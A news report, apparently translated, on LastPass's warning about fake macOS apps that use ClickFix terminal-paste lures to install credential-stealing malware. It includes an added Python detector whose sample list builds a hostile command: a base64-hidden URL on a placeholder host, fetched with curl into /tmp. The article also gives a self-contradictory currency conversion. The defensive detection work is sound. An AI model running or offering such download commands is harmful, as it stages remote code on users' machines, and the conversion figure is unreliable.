Fake password managers install viruses on Macs that steal users' credentials

Published on September 25, 2025

LastPass, a password management service, has issued a warning about a hacker campaign targeting macOS users: scammers are using the brand's name to install malware on Apple computers. Once installed, the fake app delivers a virus that steals credentials through ClickFix attacks.

Fake LastPass versions are delivered through search services such as Google or Bing, and recent updates to the virus include backdoor capabilities that allow hidden and persistent access to victims' computers. According to the company, other services have also been imitated in the campaign, which encompasses more than 100 applications. They include 1Password, Audacity, Adobe After Effects, Confluence, Dropbox, Fidelity, Gemini, Notion, Robinhood, SentinelOne and Thunderbird.

ClickFix and the use of GitHub

LastPass's research indicates that scammers use GitHub repositories to host the fake version of the software, which is delivered via ClickFix, a method that gets users to copy and paste code they do not understand into the PC's command prompt or terminal. The malware download button takes the user to another site, which asks the victim to copy and paste a text into the Mac's terminal.

The command issues a curl request to a base64-encoded URL and downloads the AMA files to the /tmp directory. The app is malware-as-a-service that costs scammers US$ 1,000 (about $ 5,340) per month and steals data from infected machines. LastPass monitors and reports fake application pages on GitHub, which deletes the repositories, but they are easily and automatically recreated, making it difficult to completely remove the virus from the internet.
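As an added example (not from LastPass or the original article), the Python below scores shell commands against the shape described above: a downloader, a URL hidden in base64, and a write to /tmp. The regexes, the 16-character threshold, the `SAMPLES` list and the example.invalid host are assumptions constructed for illustration.

```python
import base64
import re

# Assumed heuristics (not from the LastPass report); /tmp is /private/tmp on macOS.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # long enough to hold a URL
URL_PREFIX = re.compile(r"^(https?|ftp)://", re.I)
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
TMP_PATH = re.compile(r"(^|[\s=\"'>])(/private)?/tmp/")


def hidden_urls(command):
    """Return URLs that appear in the command only as base64 text."""
    urls = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except ValueError:  # bad base64, or bytes that are not UTF-8 text
            continue
        if URL_PREFIX.match(decoded):
            urls.append(decoded.strip())
    return urls


def score_command(command):
    """Flag a command only when all three traits occur together."""
    urls = hidden_urls(command)
    signals = {
        "downloader": bool(DOWNLOADER.search(command)),
        "base64_url": bool(urls),
        "writes_tmp": bool(TMP_PATH.search(command)),
    }
    return {"signals": signals, "urls": urls, "suspicious": all(signals.values())}


def encode_b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample commands; example.invalid is a placeholder host.
SAMPLES = [
    'curl -fsSL "$(echo %s | base64 -d)" -o /tmp/update'
    % encode_b64("https://downloads.example.invalid/install.sh"),
    "curl -fsSL https://example.com/tool.tar.gz -o /tmp/tool.tar.gz",
    "echo %s | base64 -d > ~/notes.txt" % encode_b64("meeting notes for thursday"),
]

for cmd in SAMPLES:
    print(score_command(cmd)["suspicious"], cmd[:45])
```

Requiring all three signals keeps ordinary downloads into /tmp and unrelated base64 use from being flagged; the same function can be run over shell history or process-execution logs.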
On macOS, ClickFix attacks are not uncommon: this year alone, the tactic has been seen imitating services such as Booking.com and troubleshooting for Apple's operating system. When searching for desktop applications on the internet, trust only the supplier's official website: if there is no macOS version, it is very likely that third-party variants are malware. Only trust alternative versions if they come from reliable sources, vouched for by numerous other users.

Source: LastPass